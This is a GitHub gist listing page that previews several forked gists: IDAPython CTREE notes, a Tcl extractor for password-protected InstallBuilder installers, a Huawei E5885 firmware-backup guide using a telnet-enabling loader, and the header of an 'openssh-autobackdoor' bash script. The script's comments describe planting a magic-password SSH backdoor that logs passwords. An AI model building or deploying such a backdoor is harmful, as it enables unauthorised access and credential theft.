Skip to content

Instantly share code, notes, and snippets.

@NyaMisty
NyaMisty / idapython_ctree.md
Created October 29, 2021 15:06 — forked from icecr4ck/idapython_ctree.md
Notes on CTREE usage with IDAPython

IDAPython CTREE

Important links

Description

The CTREE is built from the optimized microcode (maturity at CMAT_FINAL), it represents an AST-like tree with C statements and expressions. It can be printed as C code.

@NyaMisty
NyaMisty / extract-installbuilder.tcl
Last active September 3, 2023 11:11 — forked from zhangyoufu/extract-installbuilder.tcl
extract password-protected InstallBuilder installer
#!./tclkit
## prepare runtime environment
proc init {} {
## mount optional.pak (for tcltwofish)
set optionalPak installbuilder/paks/optional.pak
vfs::mk4::Mount $optionalPak $optionalPak -readonly
## adjust library search path
set ::auto_path [list $tcl::kitpath/lib/tcl$::tcl_version $tcl::kitpath/lib $tcl::kitpath/libraries $optionalPak/linux-x64 $tcl::kitpath]
@NyaMisty
NyaMisty / huawei-e5885-backup.md
Created August 6, 2020 05:12 — forked from ValdikSS/huawei-e5885-backup.md
How to backup current firmware on Huawei E5885

Huawei E5885 current firmware backup manual.

  1. Download modified usbloader, which will copy proper busybox into /system/busybox and enable telnetd on your device (will add additional line into /system/autorun.sh). Use it only on E5885, not on other device!
  2. Load it using balong-usbdload. Refer to this disassembling manual.
  3. After loading, wait about one minute, disconnect device from the computer and power off the device holding power button for ~15 seconds.
  4. Insert MicroSD card to the device and power it on.
  5. telnet 192.168.8.1 2323
/system/busybox sh
@NyaMisty
NyaMisty / openssh-autobackdoor.bash
Last active October 15, 2017 04:09 — forked from system123/openssh-autobackdoor.bash
This script provides OpenSSH backdoor functionality with a magic password and logs passwords as well. It leverages the same basic idea behind common OpenSSH patches but this script attempts to make the process version agnostic. Use at your own risk.
#!/bin/bash
# ============================================
# satyr's openssh autobackdooring doohicky v0.-1
# ImpendingSatyr@gmail.com
# ============================================
# USAGE:
# Run this script with no args and it'll prompt for the "Magic" password and location to log passwords to (incoming and outgoing).
# If you give the location that passwords will be logged to as an arg, this script will try to automate almost everything
# (Like common openssh compiling problems, such as missing pam, kerberos, zlib, openssl-devel, etc.
# [it'll install them via apt or yum, whichever is available]).